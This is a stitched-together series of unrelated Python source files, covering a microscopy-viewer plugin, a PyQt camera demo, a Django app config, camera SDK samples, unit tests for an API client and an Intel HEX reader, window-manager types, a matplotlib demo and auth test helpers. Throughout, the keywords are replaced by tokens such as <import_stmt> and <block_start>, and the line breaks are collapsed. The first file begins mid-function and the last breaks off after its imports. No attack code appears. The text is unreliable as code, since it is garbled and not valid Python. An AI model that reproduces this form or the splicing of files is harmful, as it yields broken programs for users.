img_overlay=ovLoad.loadOverlays(paths=[out_file] inmem=<true> blocking=<true>)[0]<line_sep># Display the overlay
<if_stmt>add_to_overlayList<is><true><block_start>self.overlayList.append(img_overlay)<line_sep>opts=self.displayCtx.getOpts(img_overlay)<line_sep>opts.cmap=colormap<block_end><return>img_overlay<block_end><def_stmt>get_visible_overlays self<block_start>"""
This function returns a list containing evey overlays that are visible on FSLeyes.
:return: The list of the visible overlays
:rtype: list
"""<line_sep>visible_overlay_list=[]<for_stmt>an_overlay self.overlayList<block_start>an_overlay_display=self.displayCtx.getDisplay(an_overlay)<if_stmt>an_overlay_display.enabled<is><true><block_start>visible_overlay_list.append(an_overlay)<block_end><block_end><return>visible_overlay_list<block_end><def_stmt>get_visible_image_overlay self<block_start>"""
This function is used to find the active microscopy image. This image should be visible and should NOT have the
following keywords in its name : axon, myelin, Myelin, watershed, Watershed.
:return: The visible microscopy image
:rtype: overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>image_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><if_stmt>visible_overlay_list.__len__()<is>1<block_start><return>visible_overlay_list[0]<block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(("watershed"<not><in>an_overlay.name)<and>("Watershed"<not><in>an_overlay.name)<and>(<not>an_overlay.name.endswith("-myelin"))<and>(<not>an_overlay.name.endswith("-Myelin"))<and>(<not>an_overlay.name.endswith("-Axon"))<and>(<not>an_overlay.name.endswith("-axon")))<block_start>n_found_overlays=n_found_overlays+1<line_sep>image_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one microscopy image has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start>self.show_message("No visible microscopy image has been found")<line_sep><return><none><block_end><return>image_overlay<block_end><def_stmt>get_visible_axon_overlay self<block_start>"""
This method finds the currently visible axon overlay
:return: The visible overlay that corresponds to the axon mask
:rtype: overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>axon_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(an_overlay.name.endswith("-axon"))<or>(an_overlay.name.endswith("-Axon"))<block_start>n_found_overlays=n_found_overlays+1<line_sep>axon_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one axon mask has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start>self.show_message("No visible axon mask has been found")<line_sep><return><none><block_end><return>axon_overlay<block_end><def_stmt>get_corrected_axon_overlay self<block_start>"""
This method finds a the visible corrected axon overlay if it exists
:return: The visible corrected axon overlay
:rtype overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>axon_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(an_overlay.name.endswith("-axon-corr"))<or>(an_overlay.name.endswith("-Axon-corr"))<block_start>n_found_overlays=n_found_overlays+1<line_sep>axon_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one corrected axon mask has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start><return><none><block_end><return>axon_overlay<block_end><def_stmt>get_visible_myelin_overlay self<block_start>"""
This method finds the currently visible myelin overlay
:return: The visible overlay that corresponds to the myelin mask
:rtype: overlay
"""<line_sep>visible_overlay_list=self.get_visible_overlays()<line_sep>myelin_overlay=<none><line_sep>n_found_overlays=0<if_stmt>visible_overlay_list.__len__()<is>0<block_start>self.show_message("No overlays are displayed")<line_sep><return><none><block_end><for_stmt>an_overlay visible_overlay_list<block_start><if_stmt>(an_overlay.name.endswith("-myelin"))<or>(an_overlay.name.endswith("-Myelin"))<block_start>n_found_overlays=n_found_overlays+1<line_sep>myelin_overlay=an_overlay<block_end><block_end><if_stmt>n_found_overlays<g>1<block_start>self.show_message("More than one myelin mask has been found")<line_sep><return><none><block_end><if_stmt>n_found_overlays<is>0<block_start>self.show_message("No visible myelin mask has been found")<line_sep><return><none><block_end><return>myelin_overlay<block_end><def_stmt>show_message self message caption="Error"<block_start>"""
This function is used to show a popup message on the FSLeyes interface.
:param message: The message to be displayed.
:type message: String
:param caption: (Optional) The caption of the message box.
:type caption: String
"""<with_stmt>wx.MessageDialog(self message caption=caption style=wx.OK|wx.CENTRE pos=wx.DefaultPosition )<as>msg<block_start>msg.ShowModal()<block_end><block_end><def_stmt>verrify_version self<block_start>"""
This function checks if the plugin version is the same as the one in the AxonDeepSeg directory
"""<line_sep>ads_path=Path(AxonDeepSeg.__file__).parents[0]<line_sep>plugin_path_parts=ads_path.parts[:-1]<line_sep>plugin_path=Path(*plugin_path_parts)<line_sep>plugin_file=plugin_path/"ads_plugin.py"<line_sep># Check if the plugin file exists
plugin_file_exists=plugin_file.exists()<if_stmt>plugin_file_exists<is><false><block_start><return><block_end># Check the version of the plugin
<with_stmt>open(plugin_file.__str__())<as>plugin_file_reader<block_start>plugin_file_lines=plugin_file_reader.readlines()<block_end>plugin_file_lines=[x.strip()<for>x plugin_file_lines]<line_sep>version_line='VERSION = "'+VERSION+'"'<line_sep>plugin_is_up_to_date=<true><line_sep>version_found=<false><for_stmt>lines plugin_file_lines<block_start><if_stmt>(lines.startswith("VERSION = "))<block_start>version_found=<true><if_stmt><not>(lines<eq>version_line)<block_start>plugin_is_up_to_date=<false><block_end><block_end><block_end><if_stmt>(version_found<is><false>)<or>(plugin_is_up_to_date<is><false>)<block_start>message=("A more recent version of the AxonDeepSeg plugin was found in your AxonDeepSeg installation folder. "<concat>"You will need to replace the current FSLeyes plugin which the new one. "<concat>"To proceed, go to: file -> load plugin -> ads_plugin.py. Then, restart FSLeyes.")<line_sep>self.show_message(message "Warning")<block_end><return><block_end><def_stmt>get_citation self<block_start>"""
This function returns the AxonDeepSeg paper citation.
:return: The AxonDeepSeg citation
:rtype: string
"""<line_sep><return>("If you use this work in your research, please cite it as follows: \n"<concat>"<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2018). "<concat>"AxonDeepSeg: automatic axon and myelin segmentation from microscopy data using convolutional "<concat>"neural networks. Scientific Reports, 8(1), 3816. "<concat>"Link to paper: https://doi.org/10.1038/s41598-018-22181-4. \n"<concat>"Copyright (c) 2018 NeuroPoly (Polytechnique Montreal)")<block_end><def_stmt>get_logo self<block_start>"""
This function finds the AxonDeepSeg logo saved as a png image and returns it as a wx bitmap image.
:return: The AxonDeepSeg logo
:rtype: wx.StaticBitmap
"""<line_sep>ads_path=Path(AxonDeepSeg.__file__).parents[0]<line_sep>logo_file=ads_path/"logo_ads-alpha_small.png"<line_sep>png=wx.Image(str(logo_file) wx.BITMAP_TYPE_ANY).ConvertToBitmap()<line_sep>png.SetSize((png.GetWidth() png.GetHeight()))<line_sep>logo_image=wx.StaticBitmap(self -1 png wx.DefaultPosition (png.GetWidth() png.GetHeight()))<line_sep><return>logo_image<block_end>@staticmethod<def_stmt>supportedViews <block_start>"""
I am not sure what this method does.
"""<import_from_stmt>fsleyes.views.orthopanel OrthoPanel<line_sep><return>[OrthoPanel]<block_end>@staticmethod<def_stmt>defaultLayout <block_start>"""
This method makes the control panel appear on the left of the FSLeyes window.
"""<line_sep><return>{"location":wx.LEFT}<block_end><block_end>
|
<import_from_stmt>PyQt5 QtWidgets<as>qtw<import_from_stmt>PyQt5 QtCore<as>qtc<import_from_stmt>PyQt5 QtMultimedia<as>qtmm<import_from_stmt>PyQt5 QtMultimediaWidgets<as>qtmmw<class_stmt>MainWindow(qtw.QWidget)<block_start><def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.setLayout(qtw.QVBoxLayout())<line_sep># camera
self.camera=qtmm.QCamera()<line_sep># viewfinder
cvf=qtmmw.QCameraViewfinder()<line_sep>self.camera.setViewfinder(cvf)<line_sep>self.layout().addWidget(cvf)<line_sep># Form
form=qtw.QFormLayout()<line_sep>self.layout().addLayout(form)<line_sep># zoom
zoomslider=qtw.QSlider(minimum=1 maximum=10 sliderMoved=self.on_slider_moved orientation=qtc.Qt.Horizontal)<line_sep>form.addRow('Zoom' zoomslider)<line_sep>self.camera.start()<line_sep>self.show()<block_end><def_stmt>on_slider_moved self value<block_start>focus=self.camera.focus()<line_sep>focus.zoomTo(1 value)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app=qtw.QApplication([])<line_sep>mw=MainWindow()<line_sep>app.exec()<block_end>
|
<import_from_stmt>django.apps AppConfig<import_from_stmt>django.db.models.signals post_migrate<class_stmt>BinpropertyConfig(AppConfig)<block_start>name='binproperty'<def_stmt>ready self<block_start>post_migrate.connect(do_init_data sender=self)<block_end><block_end><def_stmt>do_init_data sender **kwargs<block_start>init_category()<block_end><def_stmt>init_category <block_start>"""
:return:None
"""<try_stmt><block_start><import_from_stmt>.models ListModel<as>ls<if_stmt>ls.objects.filter(openid__iexact='init_data').exists()<block_start><if_stmt>ls.objects.filter(openid__iexact='init_data').count()<ne>4<block_start>ls.objects.filter(openid__iexact='init_data').delete()<line_sep>init_data=[ls(id=1 openid='init_data' bin_property='Damage' creater='GreaterWMS') ls(id=2 openid='init_data' bin_property='Inspection' creater='GreaterWMS') ls(id=3 openid='init_data' bin_property='Normal' creater='GreaterWMS') ls(id=4 openid='init_data' bin_property='Holding' creater='GreaterWMS')]<line_sep>ls.objects.bulk_create(init_data batch_size=100)<block_end><block_end><else_stmt><block_start>init_data=[ls(id=1 openid='init_data' bin_property='Damage' creater='GreaterWMS') ls(id=2 openid='init_data' bin_property='Inspection' creater='GreaterWMS') ls(id=3 openid='init_data' bin_property='Normal' creater='GreaterWMS') ls(id=4 openid='init_data' bin_property='Holding' creater='GreaterWMS')]<line_sep>ls.objects.bulk_create(init_data batch_size=100)<block_end><block_end><except_stmt><block_start><pass><block_end><block_end>
|
# Note: Before getting started, Basler recommends reading the Programmer's Guide topic
# in the pylon C++ API documentation that gets installed with pylon.
# If you are upgrading to a higher major version of pylon, Basler also
# strongly recommends reading the Migration topic in the pylon C++ API documentation.
# This sample illustrates how to use the image format
# converter class CImageFormatConverter.
# The image format converter accepts all image formats
# produced by Basler camera devices and it is able to
# convert these to a number of output formats.
# The conversion can be controlled by several parameters.
# See the converter class documentation for more details.
<import_from_stmt>pypylon pylon<import_from_stmt>pypylon genicam<line_sep># This is a helper function for showing an image on the screen if Windows is used,
# and for printing the first bytes of the image.
<def_stmt>show_image image message<block_start>print(message)<line_sep>pBytes=image.Array<line_sep>print("Bytes of the image: \n")<line_sep>print(pBytes)<block_end><try_stmt># Create the converter and set parameters.
<block_start>converter=pylon.ImageFormatConverter()<line_sep>converter.OutputPixelFormat=pylon.PixelType_Mono8<line_sep># Try to get a grab result for demonstration purposes.
print("Waiting for an image to be grabbed.")<try_stmt><block_start>camera=pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())<line_sep>grabResult=camera.GrabOne(1000)<line_sep>show_image(grabResult "Grabbed image.")<line_sep>targetImage=pylon.PylonImage.Create(pylon.PixelType_Mono8 grabResult.GetWidth() grabResult.GetHeight())<line_sep>print(converter.IsSupportedOutputFormat(pylon.PixelType_Mono8))<line_sep># Now we can check if conversion is required.
<if_stmt>converter.ImageHasDestinationFormat(grabResult)# No conversion is needed. It can be skipped for saving processing
# time.
<block_start>show_image(grabResult "Grabbed image.")<block_end><else_stmt># Conversion is needed.
<block_start>show_image(grabResult "Grabbed image.")<line_sep>show_image(targetImage "Converted image.")<block_end><block_end><except_stmt>genicam.GenericException<as>e<block_start>print("Could not grab an image: " e.GetDescription())<block_end><block_end><except_stmt>genicam.GenericException<as>e<block_start>print("An exception occurred. " e.GetDescription())<block_end>
|
<import_stmt>unittest<import_from_stmt>zoomus components util<import_stmt>responses<def_stmt>suite <block_start>"""Define all the tests of the module."""<line_sep>suite=unittest.TestSuite()<line_sep>suite.addTest(unittest.makeSuite(UpdateV2TestCase))<line_sep><return>suite<block_end><class_stmt>UpdateV2TestCase(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.component=components.live_stream.LiveStreamComponentV2(base_uri="http://foo.com" config={"api_key":"KEY" "api_secret":"SECRET" "version":util.API_VERSION_2 } )<block_end>@responses.activate<def_stmt>test_can_update self<block_start>responses.add(responses.PATCH "http://foo.com/meetings/42/livestream")<line_sep>response=self.component.update(meeting_id="42" stream_url="https://foo.bar" stream_key="12345")<line_sep>self.assertEqual(response.request.body '{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}' )<block_end>@responses.activate<def_stmt>test_can_update_wildcard self<block_start>responses.add(responses.PATCH "http://foo.com/meetings/42/livestream")<line_sep>data={"meeting_id":"42" "stream_url":"https://foo.bar" "stream_key":"12345" }<line_sep>response=self.component.update(**data)<line_sep>self.assertEqual(response.request.body '{"meeting_id": "42", "stream_url": "https://foo.bar", "stream_key": "12345"}' )<block_end><def_stmt>test_requires_meeting_id self<block_start><with_stmt>self.assertRaises(ValueError)<as>context<block_start>self.component.update()<line_sep>self.assertEqual(context.exception.message "'meeting_id' must be set")<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
|
'''Autogenerated by xml_generate script, do not edit!'''<import_from_stmt>OpenGL platform<as>_p arrays<line_sep># Code generation uses this
<import_from_stmt>OpenGL.raw.GLES2 _types<as>_cs<line_sep># End users want this...
<import_from_stmt>OpenGL.raw.GLES2._types *<import_from_stmt>OpenGL.raw.GLES2 _errors<import_from_stmt>OpenGL.constant Constant<as>_C<import_stmt>ctypes<line_sep>_EXTENSION_NAME='GLES2_EXT_render_snorm'<def_stmt>_f function<block_start><return>_p.createFunction(function _p.PLATFORM.GLES2 'GLES2_EXT_render_snorm' error_checker=_errors._error_checker)<block_end>GL_BYTE=_C('GL_BYTE' 0x1400)<line_sep>GL_R16_SNORM_EXT=_C('GL_R16_SNORM_EXT' 0x8F98)<line_sep>GL_R8_SNORM=_C('GL_R8_SNORM' 0x8F94)<line_sep>GL_RG16_SNORM_EXT=_C('GL_RG16_SNORM_EXT' 0x8F99)<line_sep>GL_RG8_SNORM=_C('GL_RG8_SNORM' 0x8F95)<line_sep>GL_RGBA16_SNORM_EXT=_C('GL_RGBA16_SNORM_EXT' 0x8F9B)<line_sep>GL_RGBA8_SNORM=_C('GL_RGBA8_SNORM' 0x8F97)<line_sep>GL_SHORT=_C('GL_SHORT' 0x1402)<line_sep>
|
<import_from_stmt>typing Any Dict<import_from_stmt>uuid UUID<import_from_stmt>eventsourcing.application Application<import_from_stmt>eventsourcing.examples.aggregate8.domainmodel Dog Snapshot<import_from_stmt>eventsourcing.examples.aggregate8.persistence OrjsonTranscoder PydanticMapper <import_from_stmt>eventsourcing.persistence Mapper Transcoder<class_stmt>DogSchool(Application)<block_start>env={"AGGREGATE_CACHE_MAXSIZE":"50" "DEEPCOPY_FROM_AGGREGATE_CACHE":"n" "IS_SNAPSHOTTING_ENABLED":"y" }<line_sep>snapshot_class=Snapshot<def_stmt>register_dog self name:str<arrow>UUID<block_start>dog=Dog(name)<line_sep>self.save(dog)<line_sep><return>dog.id<block_end><def_stmt>add_trick self dog_id:UUID trick:str<arrow><none><block_start>dog:Dog=self.repository.get(dog_id)<line_sep>dog.add_trick(trick)<line_sep>self.save(dog)<block_end><def_stmt>get_dog self dog_id:UUID<arrow>Dict[str Any]<block_start>dog:Dog=self.repository.get(dog_id)<line_sep><return>{"name":dog.name "tricks":tuple(dog.tricks)}<block_end><def_stmt>construct_mapper self<arrow>Mapper<block_start><return>self.factory.mapper(transcoder=self.construct_transcoder() mapper_class=PydanticMapper )<block_end><def_stmt>construct_transcoder self<arrow>Transcoder<block_start><return>OrjsonTranscoder()<block_end><block_end>
|
<import_from_future_stmt> print_function<import_stmt>pytest<import_from_stmt>keras_contrib.utils.test_utils is_tf_keras<import_from_stmt>keras_contrib.tests optimizers<import_from_stmt>keras_contrib.optimizers ftml<line_sep>@pytest.mark.xfail(is_tf_keras reason='TODO fix this.' strict=<true>)<def_stmt>test_ftml <block_start>optimizers._test_optimizer(ftml())<line_sep>optimizers._test_optimizer(ftml(lr=0.003 beta_1=0.8 beta_2=0.9 epsilon=1e-5 decay=1e-3))<block_end>
|
"""Demo of Open3D 0.10.0 Slowdown
Please modify DIRECTORY to point to the folder of meshes attached to this issue reply
"""<import_stmt>os<import_stmt>open3d<as>o3d<import_stmt>copy<line_sep>DIRECTORY='fixtures/o3d_slow_down'<line_sep># o3d 0.10.0 - 9 Seconds to load meshes (time to being user interation), 1 FPS (with draw edges enabled 'w')
# o3d 0.11.0+f1d478c4 - 0.5 seconds, 45-60 FPS (with draw edges)
duplicate=50<def_stmt>main <block_start>all_meshes=[]<line_sep>all_files=sorted(list(os.listdir(DIRECTORY)))<for_stmt>filename all_files<block_start>print(filename)<line_sep>mesh=o3d.io.read_triangle_mesh(os.path.join(DIRECTORY filename))<line_sep>all_meshes.extend([copy.deepcopy(mesh)<for>i range(duplicate)])<block_end>print(len(all_meshes))<line_sep>o3d.visualization.draw_geometries(all_meshes)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
|
#
# Copyright (c) 2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
<import_stmt>unittest<import_stmt>stcgal.ihex<class_stmt>IHEXTests(unittest.TestCase)<block_start>"""Tests for IHEX reader"""<def_stmt>test_simple self<block_start>"""Test reading a basic, valid file"""<line_sep>lines=[b":0B00000068656C6C6F5F776F726C645A" b":00000001FF"]<line_sep>bindata=stcgal.ihex.IHex.read(lines).extract_data()<line_sep>self.assertEqual(bindata b"hello_world")<block_end><def_stmt>test_empty self<block_start>"""Test reading an empty file"""<line_sep>lines=[]<line_sep>bindata=stcgal.ihex.IHex.read(lines).extract_data()<line_sep>self.assertEqual(bindata b"")<block_end><def_stmt>test_invalid self<block_start>"""Test invalid encoded data"""<line_sep>lines=[":abc"]<with_stmt>self.assertRaises(ValueError)<block_start>stcgal.ihex.IHex.read(lines)<block_end><block_end><def_stmt>test_roundtrip self<block_start>"""Test round-trip through encoder/decoder"""<line_sep>bindata=b"12345678"<for_stmt>mode (8 16 32)<block_start><with_stmt>self.subTest(mode)<block_start>hexer=stcgal.ihex.IHex()<line_sep>hexer.set_mode(mode)<line_sep>hexer.insert_data(0 bindata)<line_sep>encoded=hexer.write().encode("ASCII").splitlines()<line_sep>decoded=stcgal.ihex.IHex.read(encoded).extract_data()<line_sep>self.assertEqual(decoded bindata)<block_end><block_end><block_end><block_end>
|
<import_stmt>foundations<import_stmt>sys<line_sep>foundations.log_metric("Task" sys.argv[1])<line_sep>
|
<import_stmt>re<line_sep>"""
Module containing types used in the communication with herbstluftwm;
primarily, types used in attributes.
"""<class_stmt>Point<block_start>"""
A point on the 2D plane
"""<def_stmt>__init__ self x=0 y=0<block_start>self.x=x<line_sep>self.y=y<block_end><def_stmt>__add__ self other<block_start><return>Point(self.x+other.x self.y+other.y)<block_end><def_stmt>__sub__ self other<block_start><return>Point(self.x-other.x self.y-other.y)<block_end><def_stmt>__mul__ self scalar<block_start>"""multiply with a given scalar"""<line_sep><return>Point(self.x<times>scalar self.y<times>scalar)<block_end><def_stmt>__floordiv__ self scalar<block_start>"""divide by scalar factor, forcing to integer coordinates"""<line_sep><return>Point(self.x<floordiv>scalar self.y<floordiv>scalar)<block_end><def_stmt>__eq__ self other<block_start><return>self.x<eq>other.x<and>self.y<eq>other.y<block_end><def_stmt>__repr__ self<arrow>str<block_start><return>f'Point({self.x}, {self.y})'<block_end><block_end><class_stmt>Rectangle<block_start>"""
A rectangle on the screen, defined by its size and its distance to
the top left screen corner.
"""<def_stmt>__init__ self x=0 y=0 width=0 height=0<block_start>self.x=x<line_sep>self.y=y<line_sep>self.width=width<line_sep>self.height=height<block_end><def_stmt>__str__ self<block_start><return>f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'<block_end><def_stmt>__repr__ self<block_start><return>f'Rectangle({self.x}, {self.y}, {self.width}, {self.height})'<block_end><def_stmt>__eq__ self other<block_start><return>self.x<eq>other.x<and>self.y<eq>other.y<and>self.width<eq>other.width<and>self.height<eq>other.height<block_end><def_stmt>to_user_str self<block_start><return>"%dx%d%+d%+d"%(self.width self.height self.x self.y)<block_end>@staticmethod<def_stmt>from_user_str string<block_start>reg='([0-9]+)x([0-9]+)([+-][0-9]+)([+-][0-9]+)'<line_sep>m=re.match(reg string)<if_stmt>m<is><none><block_start><raise>Exception(f'"{string}" is not in format {reg}')<block_end>w=int(m.group(1))<line_sep>h=int(m.group(2))<line_sep>x=int(m.group(3))<line_sep>y=int(m.group(4))<line_sep><return>Rectangle(x y w h)<block_end><def_stmt>adjusted self dx=0 dy=0 dw=0 dh=0<block_start>"""return a new rectangle whose components
are adjusted by the provided deltas.
"""<line_sep><return>Rectangle(self.x+dx self.y+dy self.width+dw self.height+dh)<block_end><def_stmt>topleft self<arrow>Point<block_start>"""the top left corner of the rectangle"""<line_sep><return>Point(self.x self.y)<block_end><def_stmt>bottomright self<arrow>Point<block_start>"""the bottom right corner of the rectangle"""<line_sep><return>Point(self.x+self.width self.y+self.height)<block_end><def_stmt>center self<arrow>Point<block_start>"""the center of the rectangle, forced to integer coordinates"""<line_sep><return>self.topleft()+self.size()<floordiv>2<block_end><def_stmt>size self<arrow>Point<block_start>"""width and height of the rectangle"""<line_sep><return>Point(self.width self.height)<block_end><block_end><class_stmt>HlwmType<block_start>"""
Wrapper functions for converting between python types and types
in herbstluftwm.
"""<def_stmt>__init__ self name from_user_str to_user_str is_instance# a hlwm type should define the following
<block_start>self.name=name# type: str
# a callback for parsing
self.from_user_str=from_user_str# of type: str -> T
# a callback for printing
self.to_user_str=to_user_str# of type: T -> str
# a predicate whether a python variable has this type:
self.is_instance=is_instance<block_end># of type: Anything -> bool
@staticmethod<def_stmt>by_name type_name<block_start>"""Given the full name of a hlwm type, return
the metadata
python type"""<for_stmt>t hlwm_types()<block_start><if_stmt>t.name<eq>type_name<block_start><return>t<block_end><block_end><return><none><block_end>@staticmethod<def_stmt>by_type_of_variable python_variable<block_start>"""Given a variable, detect its type
"""<for_stmt>t hlwm_types()<block_start><if_stmt>t.is_instance(python_variable)<block_start><return>t<block_end><block_end><return><none><block_end><block_end><def_stmt>hlwm_types <block_start>"""
Return a list of HlwmType objects.
Unfortunately, the order matters for the is_instance() predicate: Here, the
first matching type in the list must be used. (This is because
`isinstance(True, int)` is true)
"""<line_sep>types=[HlwmType(name='bool' from_user_str=bool_from_user_str to_user_str=<lambda>b:'true'<if>b<else>'false' is_instance=<lambda>x:isinstance(x bool)) HlwmType(name='int' from_user_str=int to_user_str=str is_instance=<lambda>x:isinstance(x int)) # there is no uint in python, so we just convert it to 'int'
HlwmType(name='uint' from_user_str=int to_user_str=str is_instance=<lambda>x:<false>) HlwmType(name='rectangle' from_user_str=Rectangle.from_user_str to_user_str=Rectangle.to_user_str is_instance=<lambda>x:isinstance(x Rectangle)) HlwmType(name='string' from_user_str=<lambda>x:x to_user_str=<lambda>x:x is_instance=<lambda>x:isinstance(x str)) ]<line_sep><return>types<block_end><def_stmt>bool_from_user_str bool_string<block_start>"""Parse a string description of a hlwm boolean to
a python boolean"""<if_stmt>bool_string.lower()<in>['true' 'on']<block_start><return><true><block_end><if_stmt>bool_string.lower()<in>['false' 'off']<block_start><return><false><block_end><raise>Exception(f'"{bool_string}" is not a boolean')<block_end>
|
"""
=====================
Demo of 3D bar charts
=====================
A basic demo of how to plot 3D bars with and without
shading.
"""<import_stmt>numpy<as>np<import_stmt>matplotlib.pyplot<as>plt<line_sep># This import registers the 3D projection, but is otherwise unused.
<import_from_stmt>mpl_toolkits.mplot3d Axes3D# noqa: F401 unused import
# setup the figure and axes
fig=plt.figure(figsize=(8 3))<line_sep>ax1=fig.add_subplot(121 projection='3d')<line_sep>ax2=fig.add_subplot(122 projection='3d')<line_sep># fake data
_x=np.arange(4)<line_sep>_y=np.arange(5)<line_sep>_xx,_yy=np.meshgrid(_x _y)<line_sep>x,y=_xx.ravel() _yy.ravel()<line_sep>top=x+y<line_sep>bottom=np.zeros_like(top)<line_sep>width=depth=1<line_sep>ax1.bar3d(x y bottom width depth top shade=<true>)<line_sep>ax1.set_title('Shaded')<line_sep>ax2.bar3d(x y bottom width depth top shade=<false>)<line_sep>ax2.set_title('Not Shaded')<line_sep>plt.show()<line_sep>
|
"""Define several typing for convenient use"""<import_from_stmt>typing Union Callable Optional Any List<import_stmt>numpy<as>np<import_from_stmt>pymatgen.core Structure Molecule<line_sep>OptStrOrCallable=Optional[Union[str Callable[<ellipsis> Any]]]<line_sep>StructureOrMolecule=Union[Structure Molecule]<line_sep>VectorLike=Union[List[float] np.ndarray]<line_sep>
|
<import_stmt>base64<import_stmt>json<import_from_stmt>dataclasses dataclass<import_from_stmt>typing Any Dict Iterable List Tuple<import_stmt>pytest<import_from_stmt>fastapi HTTPException<import_from_stmt>fastapi.security HTTPAuthorizationCredentials<import_from_stmt>fastapi.testclient TestClient<import_from_stmt>pydantic.main BaseModel<import_from_stmt>requests.models Response<import_from_stmt>fastapi_cloudauth.base ScopedAuth UserInfoAuth<import_from_stmt>fastapi_cloudauth.verification JWKsVerifier<line_sep>@dataclass<class_stmt>Auths<block_start>protect_auth:ScopedAuth<line_sep>protect_auth_ne:ScopedAuth<line_sep>ms_auth:UserInfoAuth<line_sep>ms_auth_ne:UserInfoAuth<line_sep>invalid_ms_auth:UserInfoAuth<line_sep>invalid_ms_auth_ne:UserInfoAuth<line_sep>valid_claim:BaseModel<line_sep>invalid_claim:BaseModel<block_end><class_stmt>BaseTestCloudAuth<block_start>"""
Required
setup: initialize test case
teardown: del items for test
decode: check decoded token and assigned info
"""<line_sep>ACCESS_TOKEN=""<line_sep>SCOPE_ACCESS_TOKEN=""<line_sep>ID_TOKEN=""<line_sep>TESTAUTH:Auths<def_stmt>setup self scope:Iterable[str]<arrow><none><block_start><ellipsis><block_end># pragma: no cover
<def_stmt>teardown self<arrow><none><block_start><ellipsis><block_end># pragma: no cover
<def_stmt>decode self<arrow><none><block_start><ellipsis><block_end><block_end># pragma: no cover
<def_stmt>assert_get_response client:TestClient endpoint:str token:str status_code:int detail:str=""<arrow>Response<block_start><if_stmt>token<block_start>headers={"authorization":f"Bearer {token}"}<block_end><else_stmt><block_start>headers={}<block_end>response=client.get(endpoint headers=headers)<assert_stmt>response.status_code<eq>status_code f"{response.json()}"<if_stmt>detail<block_start><assert_stmt>response.json().get("detail" "")<eq>detail<block_end><return>response<block_end><def_stmt>_assert_verifier token verifier:JWKsVerifier<arrow>HTTPException<block_start>http_auth=HTTPAuthorizationCredentials(scheme="a" credentials=token)<with_stmt>pytest.raises(HTTPException)<as>e<block_start>verifier._verify_claims(http_auth)<block_end><return>e.value<block_end><def_stmt>_assert_verifier_no_error token verifier:JWKsVerifier<arrow><none><block_start>http_auth=HTTPAuthorizationCredentials(scheme="a" credentials=token)<assert_stmt>verifier._verify_claims(http_auth)<is><false><block_end><def_stmt>decode_token token:str<arrow>Tuple[Dict[str Any] Dict[str Any] List[str]]<block_start>header,payload,*rest=token.split(".")<line_sep>header<augadd>f"{'='<times>(len(header)%4)}"<line_sep>payload<augadd>f"{'='<times>(len(payload)%4)}"<line_sep>_header=json.loads(base64.b64decode(header).decode())<line_sep>_payload=json.loads(base64.b64decode(payload).decode())<line_sep><return>_header _payload rest<block_end>
|
<import_stmt>tensorflow<as>tf<import_from_stmt>scipy.stats rankdata<import_stmt>numpy<as>np<import_stmt>os<import_stmt>time<import_stmt>datetime<import_from_stmt>argparse ArgumentParser ArgumentDefaultsHelpFormatter<import_from_stmt>builddata_softplus *<import_from_stmt>capsuleNet CapsE<line_sep># Parameters
# ==================================================
